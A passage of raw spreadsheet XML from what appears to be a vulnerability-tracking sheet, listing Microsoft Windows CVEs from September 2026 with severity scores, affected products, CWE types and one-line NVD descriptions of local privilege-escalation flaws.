      </c>
      <c r="T311" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69814</t>
        </is>
      </c>
    </row>
    <row r="312">
      <c r="A312" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B312" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C312" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69816</t>
        </is>
      </c>
      <c r="D312" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E312" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F312" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G312" s="5" t="inlineStr"/>
      <c r="H312" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I312" s="5" t="inlineStr"/>
      <c r="J312" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K31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12" s="5" t="inlineStr"/>
      <c r="M312" s="5" t="inlineStr"/>
      <c r="N312" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O312" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P312" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q312" s="5" t="inlineStr"/>
      <c r="R312" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S312" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Accounts Control allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T312" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69816</t>
        </is>
      </c>
    </row>
    <row r="313">
      <c r="A313" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B313" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C313" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69817</t>
        </is>
      </c>
      <c r="D313" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E313" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F313" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G313" s="5" t="inlineStr"/>
      <c r="H313" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I313" s="5" t="inlineStr"/>
      <c r="J313" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K31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3" s="5" t="inlineStr"/>
      <c r="M313" s="5" t="inlineStr"/>
      <c r="N313" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O313" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P313" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q313" s="5" t="inlineStr"/>
      <c r="R313" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S313" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Bluetooth Port Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T313" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69817</t>
        </is>
      </c>
    </row>
    <row r="314">
      <c r="A314" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B314" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C314" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69818</t>
        </is>
      </c>
      <c r="D314" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E314" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F314" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G314" s="5" t="inlineStr"/>
      <c r="H314" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I314" s="5" t="inlineStr"/>
      <c r="J314" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K314" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L314" s="5" t="inlineStr"/>
      <c r="M314" s="5" t="inlineStr"/>
      <c r="N314" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O314" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P314" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q314" s="5" t="inlineStr"/>
      <c r="R314" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S314" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T314" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69818</t>
        </is>
      </c>
    </row>
    <row r="315">
      <c r="A315" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B315" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C315" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69834</t>
        </is>
      </c>
      <c r="D315" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E315" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F315" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G315" s="5" t="inlineStr"/>
      <c r="H315" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I315" s="5" t="inlineStr"/>
      <c r="J315" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K31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5" s="5" t="inlineStr"/>
      <c r="M315" s="5" t="inlineStr"/>
      <c r="N315" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O315" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P315" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q315" s="5" t="inlineStr"/>
      <c r="R315" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S315" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows ALPC allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T315" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69834</t>
        </is>
      </c>
    </row>
    <row r="316">
      <c r="A316" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B316" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C316" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69838</t>
        </is>
      </c>
      <c r="D316" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E316" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F316" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G316" s="5" t="inlineStr"/>
      <c r="H316" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I316" s="5" t="inlineStr"/>
      <c r="J316" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K31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6" s="5" t="inlineStr"/>
      <c r="M316" s="5" t="inlineStr"/>
      <c r="N316" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O316" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P316" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q316" s="5" t="inlineStr"/>
      <c r="R316" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S316" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T316" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69838</t>
        </is>
      </c>
    </row>
    <row r="317">
      <c r="A317" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B317" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C317" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69859</t>
        </is>
      </c>
      <c r="D317" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E317" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F317" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G317" s="5" t="inlineStr"/>
      <c r="H317" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I317" s="5" t="inlineStr"/>
      <c r="J317" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K31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17" s="5" t="inlineStr"/>
      <c r="M317" s="5" t="inlineStr"/>
      <c r="N317" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O317" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P317" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q317" s="5" t="inlineStr"/>
      <c r="R317" s="5" t="inlineStr">
        <is>
          <t>CWE-191, CWE-367</t>
        </is>
      </c>
      <c r="S317" s="5" t="inlineStr">
        <is>
          <t>Time-of-ch</t>
        </is>
      </c>
      <c r="T317" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69859</t>
        </is>
      </c>
    </row>
    <row r="318">
      <c r="A318" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B318" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C318" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69866</t>
        </is>
      </c>
      <c r="D318" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E318" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F318" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G318" s="5" t="inlineStr"/>
      <c r="H318" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I318" s="5" t="inlineStr"/>
      <c r="J318" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K318"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18" s="5" t="inlineStr"/>
      <c r="M318" s="5" t="inlineStr"/>
      <c r="N318" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O318" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P318" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q318" s="5" t="inlineStr"/>
      <c r="R318" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S318" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T318" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69866</t>
        </is>
      </c>
    </row>
    <row r="319">
      <c r="A319" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B319" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C319" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69889</t>
        </is>
      </c>
      <c r="D319" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E319" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F319" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G319" s="5" t="inlineStr"/>
      <c r="H319" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I319" s="5" t="inlineStr"/>
      <c r="J319" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K319"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19" s="5" t="inlineStr"/>
      <c r="M319" s="5" t="inlineStr"/>
      <c r="N319" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O319" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P319" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q319" s="5" t="inlineStr"/>
      <c r="R319" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S319" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Bluetooth Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T319" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69889</t>
        </is>
      </c>
    </row>
    <row r="320">
      <c r="A320" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B320" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C320" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69891</t>
        </is>
      </c>
      <c r="D320" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E320" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F320" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G320" s="5" t="inlineStr"/>
      <c r="H320" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I320" s="5" t="inlineStr"/>
      <c r="J320" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K32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20" s="5" t="inlineStr"/>
      <c r="M320" s="5" t="inlineStr"/>
      <c r="N320" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O320" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P320" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q320" s="5" t="inlineStr"/>
      <c r="R320" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S320" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Media allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T320" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69891</t>
        </is>
      </c>
    </row>
    <row r="321">
      <c r="A321" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B321" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C321" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69896</t>
        </is>
      </c>
      <c r="D321" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E321" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F321" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G321" s="5" t="inlineStr"/>
      <c r="H321" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I321" s="5" t="inlineStr"/>
      <c r="J321" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K321" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L321" s="5" t="inlineStr"/>
      <c r="M321" s="5" t="inlineStr"/>
      <c r="N321" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O321" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P321" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q321" s="5" t="inlineStr"/>
      <c r="R321" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S321" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T321" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69896</t>
        </is>
      </c>
    </row>
    <row r="322">
      <c r="A322" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B322" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C322" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69911</t>
        </is>
      </c>
      <c r="D322" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E322" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F322" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G322" s="5" t="inlineStr"/>
      <c r="H322" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I322" s="5" t="inlineStr"/>
      <c r="J322" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K32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22" s="5" t="inlineStr"/>
      <c r="M322" s="5" t="inlineStr"/>
      <c r="N322" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O322" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P322" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q322" s="5" t="inlineStr"/>
      <c r="R322" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S322" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T322" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69911</t>
        </is>
      </c>
    </row>
    <row r="323">
      <c r="A323" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B323" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C323" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70283</t>
        </is>
      </c>
      <c r="D323" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E323" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F323" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G323" s="5" t="inlineStr"/>
      <c r="H323" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I323" s="5" t="inlineStr"/>
      <c r="J323" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K32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23" s="5" t="inlineStr"/>
      <c r="M323" s="5" t="inlineStr"/>
      <c r="N323" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O323" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P323" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q323" s="5" t="inlineStr"/>
      <c r="R323" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S323" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T323" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70283</t>
        </is>
      </c>
    </row>
    <row r="324">
      <c r="A324" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B324" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C324" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70562</t>
        </is>
      </c>
      <c r="D324" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E324" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F324" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G324" s="5" t="inlineStr"/>
      <c r="H324" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I324" s="5" t="inlineStr"/>
      <c r="J324" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K32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24" s="5" t="inlineStr"/>
      <c r="M324" s="5" t="inlineStr"/>
      <c r="N324" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O324" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P324" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q324" s="5" t="inlineStr"/>
      <c r="R324" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="S324" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T324" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70562</t>
        </is>
      </c>
    </row>
    <row r="325">
      <c r="A325" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B325" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C325" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70565</t>
        </is>
      </c>
      <c r="D325" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E325" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F325" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G325" s="5" t="inlineStr"/>
      <c r="H325" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I325" s="5" t="inlineStr"/>
      <c r="J325" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K32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25" s="5" t="inlineStr"/>
      <c r="M325" s="5" t="inlineStr"/>
      <c r="N325" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O325" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P325" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q325" s="5" t="inlineStr"/>
      <c r="R325" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S325" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows AF_UNIX Socket Provider allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T325" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70565</t>
        </is>
      </c>
    </row>
    <row r="326">
      <c r="A326" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B326" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C326" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70567</t>
        </is>
      </c>
      <c r="D326" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E326" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F326" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G326" s="5" t="inlineStr"/>
      <c r="H326" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I326" s="5" t="inlineStr"/>
      <c r="J326" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K326" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L326" s="5" t="inlineStr"/>
      <c r="M326" s="5" t="inlineStr"/>
      <c r="N326" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O326" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P326" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q326" s="5" t="inlineStr"/>
      <c r="R326" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="S326" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Display Enhancement Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T326" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70567</t>
        </is>
      </c>
    </row>
    <row r="327">
      <c r="A327" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B327" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C327" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70568</t>
        </is>
      </c>
      <c r="D327" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E327" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F327" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G327" s="5" t="inlineStr"/>
      <c r="H327" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I327" s="5" t="inlineStr"/>
      <c r="J327" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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27" s="5" t="inlineStr"/>
      <c r="M327" s="5" t="inlineStr"/>
      <c r="N327" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O327" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P327" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q327" s="5" t="inlineStr"/>
      <c r="R327" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S327" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Defender Firewall Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T327" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70568</t>
        </is>
      </c>
    </row>
    <row r="328">
      <c r="A328" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B328" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C328" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70573</t>
        </is>
      </c>
      <c r="D328" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E328" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F328" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G328" s="5" t="inlineStr"/>
      <c r="H328" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I328" s="5" t="inlineStr"/>
      <c r="J328" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K32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28" s="5" t="inlineStr"/>
      <c r="M328" s="5" t="inlineStr"/>
      <c r="N328" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O328" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P328" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q328" s="5" t="inlineStr"/>
      <c r="R328" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="S328" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T328" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70573</t>
        </is>
      </c>
    </row>
    <row r="329">
      <c r="A329" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B329" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C329" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70585</t>
        </is>
      </c>
      <c r="D329" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E329" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F329" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
